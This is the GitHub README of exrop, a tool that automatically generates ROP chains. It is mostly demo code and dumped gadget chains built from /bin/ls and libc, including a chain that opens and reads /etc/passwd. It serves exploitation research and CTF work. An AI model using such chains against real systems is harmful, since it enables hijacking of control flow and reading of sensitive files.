
GitHub - d4em0n/exrop: Automatic ROPChain Generation

source link: https://github.com/d4em0n/exrop

README.md

exrop

Automatic ROP Chain Generation

requirements: Triton, ROPGadget

from Exrop import Exrop

rop = Exrop("/bin/ls")
rop.find_gadgets(cache=True)

# Each demo step is (banner, thunk). The thunk is kept lazy so that the banner
# is printed *before* the chain is built, exactly as the original sequence did.
_DEMO_STEPS = [
    (
        "write-regs gadgets: rdi=0x41414141, rsi:0x42424242, rdx: 0x43434343, rax:0x44444444, rbx=0x45454545",
        lambda: rop.set_regs(
            {
                'rdi': 0x41414141,
                'rsi': 0x42424242,
                'rdx': 0x43434343,
                'rax': 0x44444444,
                'rbx': 0x45454545,
            }
        ),
    ),
    (
        "write-what-where gadgets: [0x41414141]=0xdeadbeefff, [0x43434343]=0x110011",
        lambda: rop.set_writes({0x41414141: 0xdeadbeefff, 0x43434343: 0x00110011}),
    ),
    (
        "write-string gadgets 0x41414141=\"Hello world!\\n\"",
        lambda: rop.set_string({0x41414141: "Hello world!\n"}),
    ),
    (
        "func-call gadgets 0x41414141(0x20, 0x30, \"Hello\")",
        # NOTE(review): the trailing 0x7fffff00 looks like a scratch address for
        # the string argument -- confirm against Exrop.func_call's signature.
        lambda: rop.func_call(0x41414141, (0x20, 0x30, "Hello"), 0x7fffff00),
    ),
]

# Print the banner, build the chain, then dump it -- same order as the original.
for banner, build_chain in _DEMO_STEPS:
    print(banner)
    chain = build_chain()
    chain.dump()

Output:

write-regs gadget: rdi=0x41414141, rsi:0x42424242, rdx: 0x43434343, rax:0x44444444, rbx=0x45454545
$RSP+0x0000 : 0x00000000000060d0 # pop rbx; ret
$RSP+0x0008 : 0x0000000044444444
$RSP+0x0010 : 0x0000000000014852 # mov rax, rbx; pop rbx; ret
$RSP+0x0018 : 0x0000000000000000
$RSP+0x0020 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0028 : 0x0000000041414141
$RSP+0x0030 : 0x000000000000629c # pop rsi; ret
$RSP+0x0038 : 0x0000000042424242
$RSP+0x0040 : 0x0000000000003a62 # pop rdx; ret
$RSP+0x0048 : 0x0000000043434343
$RSP+0x0050 : 0x00000000000060d0 # pop rbx; ret
$RSP+0x0058 : 0x0000000045454545

write-what-where gadgets: [0x41414141]=0xdeadbeefff, [0x43434343]=0x110011
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x000000deadbeefff
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x0000000041414139
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000000110011
$RSP+0x0040 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0048 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0050 : 0x000000004343433b
$RSP+0x0058 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret

write-string gadgets 0x41414141="Hello world!\n"
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x6f77206f6c6c6548
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x0000000041414139
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000a21646c72
$RSP+0x0040 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0048 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0050 : 0x0000000041414141
$RSP+0x0058 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret

func-call gadgets 0x41414141(0x20, 0x30, "Hello")
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x0000006f6c6c6548
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x000000007ffffef8
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000000000020
$RSP+0x0040 : 0x000000000000629c # pop rsi; ret
$RSP+0x0048 : 0x0000000000000030
$RSP+0x0050 : 0x0000000000003a62 # pop rdx; ret
$RSP+0x0058 : 0x000000007fffff00
$RSP+0x0060 : 0x0000000041414141

python3 tests.py  1,48s user 0,05s system 97% cpu 1,566 total

Another example: open-read-write gadgets!

from pwn import *
from Exrop import Exrop

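binname = "/lib/x86_64-linux-gnu/libc.so.6"
libc = ELF(binname, checksec=False)

# Resolve the call targets by symbol. The original bound these to the names
# `open`, `read` and `write`, which shadowed the Python builtins of the same
# name -- any later builtin open() call in this script would have hit an int.
open_addr = libc.symbols['open']
read_addr = libc.symbols['read']
write_addr = libc.symbols['write']
# NOTE(review): bss is passed as the extra func_call argument below and as the
# buffer for read/write; it appears to serve as writable scratch space --
# confirm against Exrop.func_call's signature.
bss = libc.bss()


rop = Exrop(binname)
# NOTE(review): cache=True presumably persists the gadget list between runs;
# verify in Exrop.find_gadgets.
rop.find_gadgets(cache=True)

# Each call: banner, chain, dump -- the banner is printed before the chain is
# built so any diagnostics from func_call appear under the right heading.
print("open('/etc/passwd', 0)")
chain = rop.func_call(open_addr, ("/etc/passwd", 0), bss)
chain.dump()
print("read(2, bss, 0x100)")
chain = rop.func_call(read_addr, (2, bss, 0x100))
chain.dump()
print("write(1, bss, 0x100)")
chain = rop.func_call(write_addr, (1, bss, 0x100))
chain.dump()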

Output:

open('/etc/passwd', 0)
$RSP+0x0000 : 0x000000000002155f # pop rdi; ret
$RSP+0x0008 : 0x00000000003ec860
$RSP+0x0010 : 0x0000000000155fc6 # pop r8; mov eax, 1; ret
$RSP+0x0018 : 0x7361702f6374652f
$RSP+0x0020 : 0x0000000000044359 # mov qword ptr [rdi], r8; ret
$RSP+0x0028 : 0x000000000002155f # pop rdi; ret
$RSP+0x0030 : 0x00000000003ec868
$RSP+0x0038 : 0x0000000000155fc6 # pop r8; mov eax, 1; ret
$RSP+0x0040 : 0x0000000000647773
$RSP+0x0048 : 0x0000000000044359 # mov qword ptr [rdi], r8; ret
$RSP+0x0050 : 0x000000000002155f # pop rdi; ret
$RSP+0x0058 : 0x00000000003ec860
$RSP+0x0060 : 0x0000000000023e6a # pop rsi; ret
$RSP+0x0068 : 0x0000000000000000
$RSP+0x0070 : 0x000000000010fc40

read(2, bss, 0x100)
$RSP+0x0000 : 0x00000000001306d9 # pop rdx; pop rsi; ret
$RSP+0x0008 : 0x0000000000000100
$RSP+0x0010 : 0x00000000003ec860
$RSP+0x0018 : 0x000000000002155f # pop rdi; ret
$RSP+0x0020 : 0x0000000000000002
$RSP+0x0028 : 0x0000000000110070

write(1, bss, 0x100)
$RSP+0x0000 : 0x00000000001306d9 # pop rdx; pop rsi; ret
$RSP+0x0008 : 0x0000000000000100
$RSP+0x0010 : 0x00000000003ec860
$RSP+0x0018 : 0x000000000002155f # pop rdi; ret
$RSP+0x0020 : 0x0000000000000001
$RSP+0x0028 : 0x0000000000110140
